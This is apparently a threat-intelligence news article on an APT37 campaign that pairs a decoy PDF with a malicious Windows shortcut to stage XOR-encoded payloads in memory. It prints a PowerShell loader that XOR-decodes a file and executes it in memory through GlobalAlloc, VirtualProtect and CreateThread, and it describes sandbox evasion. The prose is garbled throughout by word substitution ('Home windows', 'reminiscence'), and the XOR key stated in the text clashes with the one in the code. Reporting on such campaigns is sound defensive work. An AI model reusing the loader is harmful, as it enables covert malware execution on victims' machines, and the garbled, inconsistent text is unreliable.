Attackers have begun leveraging a seemingly innocuous PDF publication alongside a malicious Home windows shortcut (LNK) file to infiltrate enterprise environments.
The assault surfaced in late August 2025, focusing on South Korean educational and authorities establishments beneath the guise of a legit “국가정보연구회 소식지 (52호)” PDF publication.
Victims obtain an archive containing each the PDF decoy and a companion .lnk file masquerading because the publication. When the shortcut is executed, a multi‐stage PowerShell loader embedded inside the LNK unpacks and deploys extra payloads completely in reminiscence, evading disk‐primarily based detection.
Early evaluation revealed that the LNK file hides three binary payloads at exact offsets: a decoy PDF at offset 0x0000102C, a loader binary at 0x0007EDC1, and a remaining executable at 0x0015AED2.
Upon execution, a PowerShell one-liner inside the LNK reads these offsets, writes the binaries to %TEMP% as aio0.dat, aio1.dat, and aio1+3.b+la+t, after which kicks off a batch script (aio03.bat) to decode and run the loader.
Seqrite analysts famous that this fileless method permits the attackers to bypass signature‐primarily based defenses by by no means writing the final word payload to disk.
Subsequent investigation by Seqrite researchers recognized that the ultimate payload, as soon as decrypted with a single‐byte XOR key (0x35), is injected instantly into reminiscence by way of Home windows API calls—GlobalAlloc, VirtualProtect, and CreateThread.
This reflective DLL injection approach ensures that the malicious code executes in a stealthy method, leaving minimal forensic artifacts.
Detailed reverse engineering of the loader binary uncovered surroundings checks for VMware instruments and sandbox evasion routines that stop execution in evaluation environments, confirming the excessive sophistication of the risk actor referred to as APT37.
Marketing campaign 1 an infection chain (Supply – Seqrite)
$exePath = “$env:temptony31.dat”
$exeFile = Get-Content material -Path $exePath -Encoding Byte
$key = 0x37
for ($i = 0; $i -lt $exeFile.Size; $i++) {
$exeFile[$i] = $exeFile[$i] -bxor $key
}
$buf = [Win32]::GlobalAlloc(0x40, $exeFile.Size)
[Win32]::VirtualProtect($buf, $exeFile.Size, 0x40, [ref]$outdated)
[Win32]::RtlMoveMemory($buf, $exeFile, $exeFile.Size)
[Win32]::CreateThread(0,0,$buf,0,0,[ref]$null)
An infection Mechanism
The an infection begins when the consumer double‐clicks the misleading .lnk file, which triggers PowerShell beneath the hood.
Marketing campaign 2 an infection chain (Supply – Seqrite)
The script parses its personal binary content material utilizing Get-Merchandise and ReadAllBytes, extracting the decoy PDF for show whereas staging the actual payloads.
As soon as staged, the batch loader executes Invoke-Expression on a UTF-8 decoded script saved in aio02.dat, which in flip orchestrates the XOR decryption and reflective injection of aio01.dat.
By leveraging in-memory execution, the attackers sidestep typical endpoint safety platforms that depend on disk‐primarily based scanning.
This layered an infection chain, combining decoy paperwork, embedded payloads, and fileless strategies, underlines the evolving sophistication of state‐sponsored cyber espionage campaigns.
Increase your SOC and assist your group defend what you are promoting with free top-notch risk intelligence: Request TI Lookup Premium Trial.
